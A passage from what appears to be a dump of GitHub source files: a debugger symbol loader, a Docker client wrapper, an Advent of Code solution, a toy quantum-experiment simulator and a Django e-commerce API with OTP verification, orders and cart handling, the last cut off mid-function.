\"\"\"\n load self-parsed symbols of system dlls\n\n this should only be called once during each debug session\n\n !+ to export such xxx.txt symbol file, use my python scripts.\n \"\"\"\n # xp sp3\n sym_path = os.path.join(file_dir, \"symbols_xpsp3\")\n for parent, dirnames, filenames in os.walk(sym_path):\n\n for dirname in dirnames:\n _pt_log(\">>> load sysdll symbol, ignore dir: %s\" % dirname)\n\n for filename in filenames:\n\n # only parse txt files\n if not filename.endswith(\".txt\"):\n # _pt_log(\">>> load sysdll symbol, ignore file: %s\" % filename)\n continue\n\n sym_name = filename.replace(\".txt\", \"\")\n # _pt_log(\"loading symbols for module %-10s from file: %s\" % (sym_name, filename))\n _syms_load(sym_name.lower(), os.path.join(parent, filename))\n\n\ndef load_debugee_syms():\n \"\"\"\n load self-parsed symbolf of debugee.\n this shall be called after debugee file set\n \"\"\"\n target_file = util.gen_path_tail_debugee(\"_ida_names.txt\", has_ext=False)\n if os.path.exists(target_file):\n\n _pt_log(\">>> loading debugee symbol from file: %s\" % target_file)\n _syms_load(util.debugee_name(), target_file)\n\n else:\n _pt_log(\">>> debugee symbol file not found: %s\" % target_file)\n\n\nglobal v_tmp_pted_no_sym_md_names\nv_tmp_pted_no_sym_md_names = []\n\n\ndef sym_resolve(md_name, offset):\n \"\"\"\n resolve symbol from pre-loaded symbols\n\n @param: md_name : string : module name, as key in v_tmp_symbols\n @param: offset : int : offset that address relative to module base\n\n @return: tuple : (func_name, func_offset) or (None, None)\n \"\"\"\n assert md_name and len(md_name) != 0\n\n md_name = md_name.lower()\n\n global v_tmp_symbols\n assert v_tmp_symbols and len(v_tmp_symbols) != 0\n\n # if debugee symbol not loaded, return None, but no \"ASSERT\", because it's quite common.\n if md_name == util.debugee_name() and md_name not in v_tmp_symbols:\n return (None, None)\n\n # if not, parse module, put txt file under folder, run this again\n if md_name not in v_tmp_symbols:\n\n global v_tmp_pted_no_sym_md_names\n if md_name not in v_tmp_pted_no_sym_md_names:\n _pt_log(\">>> no sym for this md: %s\" % md_name)\n v_tmp_pted_no_sym_md_names.append(md_name)\n\n # assert False\n # for sample loading dll of its own...\n return (None, None)\n\n for func_item in v_tmp_symbols[md_name]:\n if func_item[0] <= offset and offset <= func_item[1]:\n return (func_item[2], offset - func_item[0])\n\n return (None, None)\n\n\ndef get_sym_sys_dll_names():\n \"\"\"\n get sys dll names that have symbols\n\n @return: list : a list of dict\n \"\"\"\n global v_tmp_symbols\n if len(v_tmp_symbols) == 0:\n load_sysdll_syms()\n # all md names is lower()ed\n return v_tmp_symbols.keys()\n\n\ndef check_has_sys_dll_sym(sys_dll_name):\n \"\"\"\n @param: sys_dll_name : string : system dll name\n\n @return: bool :\n \"\"\"\n global v_tmp_symbols\n return sys_dll_name in v_tmp_symbols\n\n\ndef check_is_sys_dll(sys_dll_name):\n \"\"\"\n @param: sys_dll_name : string : system dll name\n\n @return: bool :\n \"\"\"\n global v_tmp_symbols\n return sys_dll_name in v_tmp_symbols\n\n\n# ---------------------------------------------------------------------------\n# END OF FILE\n# ---------------------------------------------------------------------------\n","repo_name":"xrkk/DbgBasedApiMon","sub_path":"_util/sym/sym.py","file_name":"sym.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"41792162018","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport json\nimport sys\nimport logging\n\nimport six\nfrom docker.errors import APIError\n\nfrom ..exceptions import DockerStatusError\nfrom ..docker_api import APIClient\nfrom . import use_get_archive\nfrom .docker_util import DockerUtilityMixin\n\nlog = logging.getLogger(__name__)\n\nLOG_PROGRESS_FORMAT = \"{0} {1} {2}\"\nLOG_CONTAINER_FORMAT = \"[%s] %s\"\n\n\ndef parse_response(response):\n \"\"\"\n Decodes the JSON response, simply ignoring syntax errors. Therefore it should be used for filtering visible output\n only.\n\n :param response: Server response as a JSON string.\n :type response: unicode | str\n :return: Decoded object from the JSON string. Returns an empty dictionary if input was invalid.\n :rtype: dict\n \"\"\"\n if isinstance(response, six.binary_type):\n response = response.decode('utf-8')\n try:\n obj = json.loads(response)\n except ValueError:\n return {}\n return obj\n\n\nclass DockerClientWrapper(DockerUtilityMixin, APIClient):\n \"\"\"\n Adds a few utility functions to the Docker API client.\n \"\"\"\n def _docker_log_stream(self, response, raise_on_error):\n log_str = None\n image_str = None\n for e in response:\n output = parse_response(e)\n if 'stream' in output:\n log_str = output['stream']\n if log_str.startswith('Successfully built '):\n image_str = log_str\n self.push_log(log_str, logging.INFO)\n elif 'error' in output:\n log_str = output['error']\n self.push_log(log_str, logging.ERROR)\n if raise_on_error:\n raise DockerStatusError(log_str, output.get('errorDetail'))\n return image_str or log_str # Line with image id or last line written to stdout\n\n def _docker_status_stream(self, response, raise_on_error):\n result = {}\n for e in response:\n output = parse_response(e)\n if output:\n result.update(output)\n if 'status' in output:\n oid = output.get('id')\n progress = output.get('progress', '')\n if oid:\n self.push_progress(output['status'], oid, progress)\n else:\n self.push_log(output['status'], logging.INFO)\n elif 'error' in output:\n error_message = output['error']\n self.push_log(error_message, logging.ERROR)\n if raise_on_error:\n raise DockerStatusError(error_message, output.get('errorDetail'))\n return result\n\n def push_progress(self, status, object_id, progress):\n \"\"\"\n Handles streamed progress information.\n\n :param status: Status text.\n :type status: unicode | str\n :param object_id: Object that the progress is reported on.\n :type object_id: unicode | str\n :param progress: Progress bar.\n :type progress: unicode | str\n \"\"\"\n pass\n\n def build(self, tag, add_latest_tag=False, add_tags=None, raise_on_error=True, **kwargs):\n \"\"\"\n Overrides the superclass `build()` and filters the output. Messages are deferred to `push_log`, whereas the\n final message is checked for a success message. If the latter is found, only the new image id is returned.\n\n :param tag: Tag of the new image to be built. Unlike in the superclass, this is obligatory.\n :type tag: unicode | str\n :param add_latest_tag: In addition to the image ``tag``, tag the image with ``latest``.\n :type add_latest_tag: bool\n :param add_tags: Additional tags. Can also be used as an alternative to ``add_latest_tag``.\n :type add_tags: list[unicode | str]\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: See :meth:`docker.client.Client.build`.\n :return: New, generated image id or `None`.\n :rtype: unicode | str\n \"\"\"\n response = super(DockerClientWrapper, self).build(tag=tag, **kwargs)\n # It is not the kwargs alone that decide if we get a stream, so we have to check.\n if isinstance(response, tuple):\n image_id = response[0]\n else:\n last_log = self._docker_log_stream(response, raise_on_error)\n if last_log and last_log.startswith('Successfully built '):\n # Remove prefix\n if last_log[-1] == '\\n':\n image_id = last_log[19:-1]\n else:\n image_id = last_log[19:]\n else:\n image_id = None\n\n if not image_id:\n return None\n\n self.add_extra_tags(image_id, tag, add_tags, add_latest_tag)\n return image_id\n\n def login(self, username, password=None, email=None, registry=None, reauth=False, **kwargs):\n \"\"\"\n Login to a Docker registry server.\n\n :param username: User name for login.\n :type username: unicode | str\n :param password: Login password; may be ``None`` if blank.\n :type password: unicode | str\n :param email: Optional; email address for login.\n :type email: unicode | str\n :param registry: Optional registry URL to log in to. Uses the Docker index by default.\n :type registry: unicode | str\n :param reauth: Re-authenticate, even if the login has been successful before.\n :type reauth: bool\n :param kwargs: Additional kwargs to :meth:`docker.client.Client.login`.\n :return: ``True`` if the login has succeeded, or if it has not been necessary as it succeeded before. ``False``\n otherwise.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).login(username, password, email, registry, reauth=reauth, **kwargs)\n return response.get('Status') == 'Login Succeeded' or response.get('username') == username\n\n def pull(self, repository, tag=None, stream=False, raise_on_error=True, **kwargs):\n \"\"\"\n Pulls an image repository from the registry.\n\n :param repository: Name of the repository.\n :type repository: unicode | str\n :param tag: Optional tag to pull; by default pulls all tags of the given repository.\n :type tag: unicode | str\n :param stream: Use the stream output format with additional status information.\n :type stream: bool\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: Additional kwargs for :meth:`docker.client.Client.pull`.\n :return: ``True`` if the image has been pulled successfully.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).pull(repository, tag=tag, stream=stream, **kwargs)\n if stream:\n result = self._docker_status_stream(response, raise_on_error)\n else:\n result = self._docker_status_stream(response.split('\\r\\n') if response else (), raise_on_error)\n return result and not result.get('error')\n\n def push(self, repository, stream=False, raise_on_error=True, **kwargs):\n \"\"\"\n Pushes an image repository to the registry.\n\n :param repository: Name of the repository (can include a tag).\n :type repository: unicode | str\n :param stream: Use the stream output format with additional status information.\n :type stream: bool\n :param raise_on_error: Raises errors in the status output as a DockerStatusException. Otherwise only logs\n errors.\n :type raise_on_error: bool\n :param kwargs: Additional kwargs for :meth:`docker.client.Client.push`.\n :return: ``True`` if the image has been pushed successfully.\n :rtype: bool\n \"\"\"\n response = super(DockerClientWrapper, self).push(repository, stream=stream, **kwargs)\n if stream:\n result = self._docker_status_stream(response, raise_on_error)\n else:\n result = self._docker_status_stream(response.split('\\r\\n') if response else (), raise_on_error)\n return result and not result.get('error')\n\n def push_container_logs(self, container):\n \"\"\"\n Reads the current container logs and passes them to :meth:`~push_log`. Removes a trailing empty line and\n prefixes each log line with the container name.\n\n :param container: Container name or id.\n :type container: unicode | str\n \"\"\"\n logs = self.logs(container).decode('utf-8')\n log_lines = logs.split('\\n')\n if log_lines and not log_lines[-1]:\n log_lines.pop()\n for line in log_lines:\n self.push_log(LOG_CONTAINER_FORMAT, logging.INFO, container, line)\n\n def remove_container(self, container, raise_on_error=True, raise_not_found=False, **kwargs):\n \"\"\"\n Removes a container. For convenience optionally ignores API errors.\n\n :param container: Container name or id.\n :type container: unicode | str\n :param raise_on_error: Errors on stop and removal may result from Docker volume problems, that may not\n affect further actions. Such errors are always logged, but do not raise an exception if this is set to\n ``True``.\n :type raise_on_error: bool\n :param raise_not_found: Whether to raise 404 errors, i.e. that the container to be removed was not\n found. Default is ``False``.\n :type raise_not_found: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.remove_container`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).remove_container(container, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n if e.response.status_code == 404:\n if raise_not_found:\n six.reraise(*exc_info)\n else:\n self.push_log(\"Failed to remove container '%s': %s\", logging.ERROR, container, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def remove_image(self, image, raise_on_error=True, raise_not_found=False, **kwargs):\n \"\"\"\n Removes a container. For convenience optionally ignores API errors.\n\n :param image: Image name or id.\n :type image: unicode | str\n :param raise_on_error: Errors on image removal may not affect further actions. Such errors are always\n logged, but do not raise an exception if this is set to ``True``.\n :param raise_not_found: Whether to raise 404 errors, i.e. that the image to be removed was not\n found. Default is ``False``.\n :type raise_not_found: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.remove_image`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).remove_image(image, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n if e.response.status_code == 404:\n if raise_not_found:\n six.reraise(*exc_info)\n else:\n self.push_log(\"Failed to remove image '%s': %s\", logging.ERROR, image, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def stop(self, container, raise_on_error=True, **kwargs):\n \"\"\"\n Stops a container. For convenience optionally ignores API errors.\n\n :param container: Container name.\n :type container: unicode | str\n :param raise_on_error: Errors on stop and removal may result from Docker volume problems, that may not\n affect further actions. Such errors are always logged, but do not raise an exception if this is set to\n ``True``.\n :type raise_on_error: bool\n :param kwargs: Additional keyword args for :meth:`docker.client.Client.stop`.\n \"\"\"\n try:\n super(DockerClientWrapper, self).stop(container, **kwargs)\n except APIError as e:\n exc_info = sys.exc_info()\n self.push_log(\"Failed to stop container '%s': %s\", logging.ERROR, container, e.explanation)\n if raise_on_error:\n six.reraise(*exc_info)\n\n def copy_resource(self, container, resource, local_filename):\n \"\"\"\n *Experimental:* Copies a resource from a Docker container to a local tar file. For details, see\n :meth:`docker.client.Client.copy`.\n\n :param container: Container name or id.\n :type container: unicode | str\n :param resource: Resource inside the container.\n :type resource: unicode | str\n :param local_filename: Local file to store resource into. Will be overwritten if present.\n :type local_filename: unicode | str\n \"\"\"\n if use_get_archive(self.api_version):\n raw = self.get_archive(container, resource)[0]\n else:\n raw = self.copy(container, resource)\n try:\n with open(local_filename, 'wb+') as f:\n for buf in raw:\n f.write(buf)\n finally:\n raw.close()\n\n def save_image(self, image, local_filename):\n \"\"\"\n *Experimental:* Copies an image from Docker to a local tar file. For details, see\n :meth:`docker.client.Client.get_image`.\n\n :param image: Image name or id.\n :type image: unicode | str\n :param local_filename: Local file to store image into. Will be overwritten if present.\n :type local_filename: unicode | str\n \"\"\"\n raw = self.get_image(image)\n try:\n with open(local_filename, 'wb+') as f:\n for buf in raw:\n f.write(buf)\n finally:\n raw.close()\n","repo_name":"merll/docker-map","sub_path":"dockermap/client/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":14010,"program_lang":"python","lang":"en","doc_type":"code","stars":74,"dataset":"github-code","pt":"72"} +{"seq_id":"11926348335","text":"\ninp = open(\"day13.input\").readlines()\nts = int(inp[0])\nbusses = [int(x) for x in inp[1].strip().split(\",\") if x != \"x\"]\nprint(ts, busses)\n\nminutes = 0\nwhile not any(map(lambda n: (ts+minutes) % n == 0, busses)):\n minutes += 1\nbus = list(filter(lambda n: (ts+minutes) % n == 0, busses))\n\nprint(ts+minutes, bus, minutes*bus[0])\nschedule = [int(x) for x in inp[1].strip().replace(\"x\", \"-1\").split(\",\")]\n\nnb = []\nfor i in range(len(schedule)):\n if schedule[i] == -1:\n continue\n nb += [(i, schedule[i])]\n\n\nn, a = zip(*nb)\nprint(n, a)\n\nstepSize = 1\nwaiting = True\nts = stepSize\n#i = 1\nbroken = False\nfor i in range(len(a)):\n while (ts+n[i]) % a[i] != 0:\n ts += stepSize\n print(f\"Found ts {ts} satisfying bus {i}, {a[i]}\")\n stepSize *= a[i]\n\nprint(ts)\nprint(\"#\"*80)\n","repo_name":"cpebble/advent_of_code","sub_path":"2020/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6770680889","text":"#!/usr/bin/env python3\n\nimport random\n\nBLACK, WHITE = True, False\nHARD, SOFT = True, False\n\n\nclass Bench:\n def __init__(self, width, height):\n self.grid = []\n self.source_location = None\n\n for i in range(height):\n self.grid.append([Space()] * width)\n\n def display(self):\n for row in self.grid:\n print(\" \".join(cell.display for cell in row))\n\n def place(self, x, y, component):\n if not isinstance(self.grid[y][x], Space):\n raise ValueError\n if isinstance(component, Source):\n if self.source_location:\n raise ValueError # only one source allowed\n self.source_location = (x, y)\n self.grid[y][x] = component\n\n def run(self, iterations=1):\n for i in range(iterations):\n # classical for now\n p = dict(\n color=random.choice([BLACK, WHITE]),\n hardness=random.choice([HARD, SOFT]),\n )\n x, y = self.source_location\n dx, dy = 1, 0\n while True:\n x += dx\n y += dy\n try:\n p, dx, dy = self.grid[y][x].hit(p, dx, dy)\n if (dx, dy) == (0, 0):\n break\n except IndexError:\n break\n\n\nclass Space:\n display = \".\"\n\n def hit(self, p, dx, dy):\n return p, dx, dy\n\n\nclass Source:\n display = \"S\"\n\n\nclass Box:\n def hit(self, p, dx, dy):\n if (dx, dy) != (1, 0): # particle must come from left\n return p, 0, 0\n if p[self.property_name]:\n return p, 0, -1\n else:\n return p, 1, 0\n\n\nclass ColorBox(Box):\n display = \"C\"\n property_name = \"color\"\n\n\nclass HardnessBox(Box):\n display = \"H\"\n property_name = \"hardness\"\n\n\nclass Mirror:\n display = \"/\"\n\n def hit(self, p, dx, dy):\n return p, -dy, -dx\n\n\nclass Joiner:\n display = \"M\"\n\n def hit(self, p, dx, dy):\n if (dx, dy) == (1, 0) or (dx, dy) == (0, -1):\n return p, 1, 0\n else:\n return p, 0, 0\n\n\nclass Wall:\n display = \"W\"\n\n def hit(self, p, dx, dy):\n return p, 0, 0\n\n\nclass Detector:\n display = \"D\"\n\n def __init__(self):\n self.count = 0\n\n def hit(self, p, dx, dy):\n self.count += 1\n return p, 0, 0\n\n\nif __name__ == \"__main__\":\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(8, 8, detector_1)\n bench.place(6, 6, detector_2)\n bench.display()\n bench.run()\n print(detector_1.count)\n print(detector_2.count)\n\n bench.place(6, 8, Mirror())\n bench.display()\n bench.run(2)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(5, 8, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(7, 8, detector_1)\n bench.place(5, 6, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(7, 8, detector_1)\n bench.place(5, 6, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(10, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(7, 8, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(9, 8, detector_1)\n bench.place(7, 6, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, HardnessBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, HardnessBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n\n bench = Bench(13, 10)\n bench.place(1, 8, Source())\n bench.place(3, 8, ColorBox())\n bench.place(5, 8, HardnessBox())\n bench.place(5, 6, Mirror())\n bench.place(7, 8, Mirror())\n bench.place(6, 8, Wall())\n bench.place(7, 6, Joiner())\n bench.place(9, 6, ColorBox())\n detector_1 = Detector()\n detector_2 = Detector()\n bench.place(11, 6, detector_1)\n bench.place(9, 4, detector_2)\n bench.display()\n bench.run(100)\n # the result here will be very different classical vs quantum\n print(detector_1.count)\n print(detector_2.count)\n","repo_name":"jtauber/quantum-workbench","sub_path":"qwb.py","file_name":"qwb.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33721984566","text":"from rest_framework import generics\nfrom rest_framework.views import APIView\nfrom adminn.models import Product\nfrom client.models import Coupon\nfrom client.serializer import CouponSerializer, ProductWithOptionSerializer\nfrom .serializer import *\nfrom adminn.serializers import ProductSerializer\nfrom .models import *\nfrom rest_framework.permissions import AllowAny, IsAuthenticated\nfrom .models import User\nfrom rest_framework.response import Response\nfrom django.http import HttpResponse, JsonResponse\nfrom adminn.models import Option\nfrom rest_framework.decorators import api_view, permission_classes\nfrom django.core.mail import send_mail\nfrom rest_framework.parsers import FormParser, MultiPartParser\nimport vonage, os\nfrom django.conf import settings\nprint(f\"EMAIL_HOST = {settings.EMAIL_HOST}\")\n\nclient = vonage.Client(key=os.environ.get(\"SMS_KEY\"), secret=os.environ.get(\"SMS_SECRET\"))\nsms = vonage.Sms(client)\n\n\ndef generate__otp():\n otp = random.randint(100000, 999999)\n return otp\n\n\ndef send_otp(ph_number, otp):\n response = sms.send_message({\n 'from': 'VIMANI',\n 'to': ph_number,\n 'text': f\"Your OTP is {otp}\",\n })\n return response\n\n\ndef send_email(email, subject, otp):\n message = f\"This is verification code for your vimani account.\\n\\n{otp}\"\n send_mail(subject, message, 'Vimani Pvt. ', [email], fail_silently=False)\n\n\nclass UserDetails(generics.RetrieveAPIView):\n permission_classes = [IsAuthenticated]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def get(self, request):\n return Response(self.serializer_class(request.user).data)\n\n\nclass RegisterView(generics.CreateAPIView):\n permission_classes = [AllowAny]\n queryset = User.objects.all()\n serializer_class = UserSerializer\n\n def post(self, request):\n data = request.data\n data[\"is_email_verified\"] = False\n data[\"is_mobile_verified\"] = False\n data[\"active\"] = False\n data[\"last_otp_email\"] = generate__otp()\n data[\"last_otp_ph_number\"] = generate__otp()\n serializer = self.serializer_class(data=data)\n res = send_otp(data[\"ph_number\"], data[\"last_otp_ph_number\"])\n print(res)\n if res[\"messages\"][0][\"status\"] != \"0\":\n return Response({\"error\": \"Something went wrong. Please try again later.\"})\n if serializer.is_valid():\n serializer.save()\n send_email(data[\"email\"], \"Vimani OTP\", data[\"last_otp_email\"])\n return Response(serializer.data)\n return Response(serializer.errors)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef verify_otp(request):\n data = request.data\n user = User.objects.get(ph_number=data[\"ph_number\"])\n email_verified = user.is_email_verified\n mobile_verified = user.is_mobile_verified\n if user.last_otp_email == int(data[\"email_otp\"]):\n user.is_email_verified = True\n user.save()\n email_verified = True\n if user.last_otp_ph_number == int(data[\"mobile_otp\"]):\n user.is_mobile_verified = True\n user.save()\n mobile_verified = True\n if email_verified and mobile_verified:\n user.active = True\n user.save()\n return Response({\"success\": \"Your account has been verified.\", \"user\": UserSerializer(user).data, \"token\": user.auth_token.key})\n return JsonResponse({\"status\": \"failure\", \"email\": email_verified, \"mobile\": mobile_verified})\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef resend_otp(request):\n data = request.data\n user = User.objects.get(ph_number=data[\"ph_number\"])\n res = send_otp(str(user.ph_number).replace(\"+\",\"\"), user.last_otp_ph_number)\n if res[\"messages\"][0][\"status\"] != \"0\":\n return Response({\"error\": \"Something went wrong. Please try again later.\"})\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return JsonResponse({\"status\": \"success\"})\n\n\nclass AddressApi(generics.ListCreateAPIView):\n queryset = Address.objects.all()\n serializer_class = AddressSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(user=self.request.user)\n\n def post(self, request):\n data = request.data\n data[\"user\"] = request.user.id\n serialized = self.serializer_class(data=data)\n if serialized.is_valid():\n serialized.save()\n return Response({\"success\": True, \"data\": serialized.data})\n return Response({\"success\": False, \"error\": serialized.errors})\n\n\nclass AddressUpdateApi(generics.UpdateAPIView):\n queryset = Address.objects.all()\n serializer_class = AddressSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass OrderApi(generics.ListCreateAPIView):\n queryset = MidOrder.objects.all()\n serializer_class = MidOrderWithStatusSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(order__user=self.request.user)\n\n def post(self, request):\n data = request.data\n if not data or \"products\" not in data:\n return Response(400)\n data[\"user\"] = request.user.id\n products = data.pop(\"products\")\n address = Address.objects.filter(address_id=data.pop(\"address_id\")).first()\n if not address:\n return Response({\"success\": False, \"error\": \"Invalid address\"})\n \n # signature\n # rz_payment_id\n # rz_order_id\n if data['payment_method'].lower() != 'cod':\n rz_data = {\n 'razorpay_order_id': data.get('rz_order_id'),\n 'razorpay_payment_id': data.get('rz_payment_id'),\n 'razorpay_signature': data.get('signature')\n }\n if not (settings.CLIENT.utility.verify_payment_signature(rz_data)):\n return Response({\"success\": False, \"error\": \"payment id not valid\"})\n \n data[\"address\"] = f\"{address.name}, {address.address_1}, {address.address_2}, {address.city}, {address.state}, {address.country}, {address.ph_number}\"\n order = OrderSerializer(data=data)\n total_amount = 0\n if order.is_valid():\n order.save()\n for product in products:\n if \"id\" not in product:\n continue\n option = Option.objects.filter(id=product[\"id\"]).first()\n if option:\n mid_order = {\n \"product\": option.id,\n \"order\": order.data[\"oid\"],\n \"unit_size\": option.unit_size,\n \"product_price\": option.product.sale_price,\n \"quantity\": product[\"quantity\"],\n }\n mid = MidOrderSerializer(data=mid_order)\n if mid.is_valid():\n mid.save()\n status = OrderStatusSerializer(data={\"status\": \"order_placed\", \"midorder\": mid.data[\"mid\"]})\n if status.is_valid():\n status.save()\n option.in_stock = option.in_stock - int(product[\"quantity\"])\n option.save()\n product = option.product\n product.orders += 1\n product.save()\n brand = product.brand\n brand.orders += 1\n brand.save()\n category = product.category\n category.orders += 1\n category.save()\n subcategory = product.subcategory\n subcategory.orders += 1\n subcategory.save()\n total_amount += option.product.sale_price * int(mid.data[\"quantity\"])\n else:\n print(mid.errors)\n created_order = Order.objects.get(oid=order.data[\"oid\"])\n created_order.total_amount = total_amount\n created_order.save()\n return Response({\"success\":True, \"data\": OrderWithMidOrder(created_order).data})\n return Response({\"success\": False, \"error\": order.errors})\n\n\nclass UpdateStatus(generics.UpdateAPIView):\n queryset = MidOrder.objects.all()\n serializer_class = MidOrderSerializer\n permission_classes = [IsAuthenticated]\n\n def get_object(self):\n return self.get_queryset().filter(order__user=self.request.user).filter(mid=self.kwargs.get(\"pk\")).first()\n\n def update(self, request, *args, **kwargs):\n data = request.data\n if not data or \"status\" not in data:\n return Response(400)\n mid = self.get_object()\n if mid:\n if \"cancel\" in data[\"status\"].lower():\n mid.is_canceled = True\n mid.status = data[\"status\"]\n mid.save()\n status = OrderStatusSerializer(data={\"status\": data[\"status\"], \"midorder\": mid.mid})\n if status.is_valid():\n status.save()\n return Response({\"success\": True, \"data\": status.data})\n return Response({\"success\": False, \"error\": status.errors})\n return Response({\"success\": False, \"error\": \"Mid order not found\"})\n\n\nclass OrderByStatus(generics.ListAPIView):\n queryset = MidOrder.objects.all()\n serializer_class = MidOrderWithStatusSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return super().get_queryset().filter(order__user=self.request.user).filter(status=self.request.GET.get(\"status\"))\n\n\nclass CartApi(APIView):\n\n queryset = Cart.objects.all()\n permission_classes = [IsAuthenticated]\n serializer_class = CartWithProductSerializer\n \n def get(self, request):\n cart = request.user.cart_set.all()\n return JsonResponse({\"cart\": self.serializer_class(cart, many=True).data}, safe=False)\n\n def post(self, request):\n cart = request.user.cart_set.all()\n option = Option.objects.filter(id=request.data.get(\"id\")).first()\n if option in cart:\n return JsonResponse({\"success\": False, \"error\": \"Product already in cart\"})\n data = request.data\n data[\"option\"] = data.pop(\"id\")\n data[\"product\"] = option.product.pid\n data[\"user\"] = request.user.id\n serialized = CartSerializer(data=data)\n if serialized.is_valid():\n serialized.save()\n return JsonResponse({\"success\": True, \"data\": serialized.data}, safe=False)\n return JsonResponse({\"success\": False, \"error\": serialized.errors}, safe=False)\n \n def put(self, request):\n try:\n cart_product = request.user.cart_set.all().get(option=request.data.get(\"id\"))\n except:\n return HttpResponse(404)\n if cart_product:\n cart_product.quantity = request.data.get(\"quantity\", 1)\n cart_product.save()\n return JsonResponse({\"success\": True}, safe=False)\n else: return HttpResponse(404)\n \n def delete(self, request):\n cart_product = request.user.cart_set.all().get(option=request.GET.get(\"id\"))\n if cart_product:\n cart_product.delete()\n return JsonResponse({\"success\": True}, safe=False)\n return HttpResponse(404)\n\n\nclass WishList(APIView):\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n data = request.user.product_set.all()\n return JsonResponse(ProductWithOptionSerializer(data, many=True).data, safe=False)\n\n def post(self, request):\n wishlist_products = request.user.product_set\n try:\n product = Product.objects.get(pid=request.GET.get(\"pid\"))\n except:\n return HttpResponse(404)\n if product:\n if product not in wishlist_products.all():\n wishlist_products.add(product)\n return JsonResponse({\"success\": True}, safe=False)\n return HttpResponse(409)\n return HttpResponse(404)\n\n def delete(self, request):\n wishlist_products = request.user.product_set\n try:\n is_exist = wishlist_products.get(pid=request.GET.get('pid'))\n except:\n return HttpResponse(404)\n if is_exist:\n wishlist_products.remove(is_exist)\n return JsonResponse({\"success\": True}, safe=False)\n return HttpResponse(404)\n\n\n@api_view(['POST'])\n@permission_classes((AllowAny,))\ndef login_with_ph_number(request):\n data = request.data\n user = User.objects.filter(ph_number=data.get('ph_number')).first()\n if (user):\n if user.check_password(data[\"password\"]):\n try:\n if user.is_email_verified and user.is_mobile_verified:\n return Response({\"success\": True, \"token\": user.auth_token.key, \"user\": UserSerializer(user).data})\n else:\n user.last_otp_email = generate__otp()\n user.last_otp_ph_number = generate__otp()\n user.save()\n send_otp(str(user.ph_number), user.last_otp_ph_number)\n send_email(user.email, \"Vimani OTP\", user.last_otp_email)\n return Response({\"success\": False, \"error\": \"Please verify your email and phone number\"})\n except Exception as e:\n print(e)\n return Response({\"success\": False, \"error\": \"Server unable to authenticate 